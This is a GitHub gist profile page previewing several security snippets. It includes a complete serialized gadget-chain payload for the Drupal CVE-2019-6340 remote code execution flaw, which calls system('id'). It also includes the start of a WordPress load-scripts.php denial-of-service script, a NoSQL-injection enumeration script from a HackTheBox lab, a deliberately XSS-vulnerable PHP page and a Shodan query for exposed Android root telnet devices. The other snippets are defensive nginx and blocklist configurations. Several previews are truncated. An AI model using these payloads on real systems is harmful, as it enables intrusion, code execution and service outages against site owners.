Skip to content

Instantly share code, notes, and snippets.

View theMiddleBlue's full-sized avatar

theMiddle theMiddleBlue

View GitHub Profile
@theMiddleBlue
theMiddleBlue / docker-compose.yml
Created December 24, 2020 08:49
CVE-20197609 PoC
version: '2.2'
services:
es01:
image: docker.elastic.co/elasticsearch/elasticsearch:6.5.0
container_name: elastic
environment:
- node.name=elastic
- cluster.name=es-docker-cluster
- discovery.type=single-node
- "ES_JAVA_OPTS=-Xms512m -Xmx512m"
@theMiddleBlue
theMiddleBlue / index.php
Created August 21, 2020 14:15
XSS Vulnerable Web Application
<html>
<body>
<?php
function sanitize_username($username) {
return strtr(
htmlentities($username, ENT_QUOTES),
[';' => '']
);
}
@theMiddleBlue
theMiddleBlue / drupal8rce.json
Created March 8, 2019 13:55
Drupal CVE-2019-6340
{
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links": {
"type": {
"href": "http://localhost/rest/type/shortcut/default"
@theMiddleBlue
theMiddleBlue / tt.php
Created October 15, 2018 13:24
machinebox hp video rev3rse security
<?php
if(isset($_POST['photo'])) {
// echo $_POST['photo'];
file_put_contents('/usr/local/openresty/nginx/html/test.jpg', base64_decode($_POST['photo']));
exec("curl -s -X POST -F 'file=@/usr/local/openresty/nginx/html/test.jpg' http://192.168.1.4:8080/facebox/check", $a);
echo(implode('', $a));
@theMiddleBlue
theMiddleBlue / DNSBL.conf
Last active November 4, 2023 23:35
Nginx Lua DNSBL
# Configuration
# --------------
# Comment the following line if you are not behind a proxy_pass or load balancer
set $dnsbl_clientip $remote_addr;
# Uncomment if the client IP is on X-Forwarded-For
#set $dnsbl_clientip $http_x_forwarded_for;
# Uncomment if you are using CloudFlare
@theMiddleBlue
theMiddleBlue / htb-node-enumerate.sh
Created March 4, 2018 10:35
HTB Node user enumeration via mongodb nosqli
#!/bin/bash
# Usage: ./htb-node-enumerate.sh r
chars='qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM$'
function getchar() {
for (( i=0; i<${#chars}; i++ )); do
if [ -z $2 ]; then
@theMiddleBlue
theMiddleBlue / dos.py
Created February 5, 2018 13:40
wordpress load-scripts dos
import requests, sys
payload = '/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-
@theMiddleBlue
theMiddleBlue / nginx.conf
Last active April 14, 2020 12:33
Nginx human user recognition
server {
listen 80;
server_name example.com;
encrypted_session_key 'v1-clG~!~v7B_Z0yu.:iw*Rj#l-Nc8E^';
encrypted_session_iv "themiddlerfvbgt5";
encrypted_session_expires 20;
location ~ /botbuster.js {
default_type 'text/javascript';
@theMiddleBlue
theMiddleBlue / secthemall-tor.py
Last active January 29, 2021 13:39
Script for download the SECTHEMALL Tor Reputation IPs list
#!/usr/bin/env python
# ---------------- CONFIG ------------------
username = "your@secthemall username here"
apikey = "your API Key here"
size = "1000"
sleep_sec = 60
nginx_reload_cmd = "service nginx reload"
@theMiddleBlue
theMiddleBlue / shodan.py
Created August 19, 2017 17:38
Shodan.io API
import httplib, urllib, re, sys, json, socket, struct
# python shodan.py 0
# ^ this is the page number
shodan = {
'apikey': '<your shodan API key>',
'query': r'"root%40"+"android"+port%3A23',
}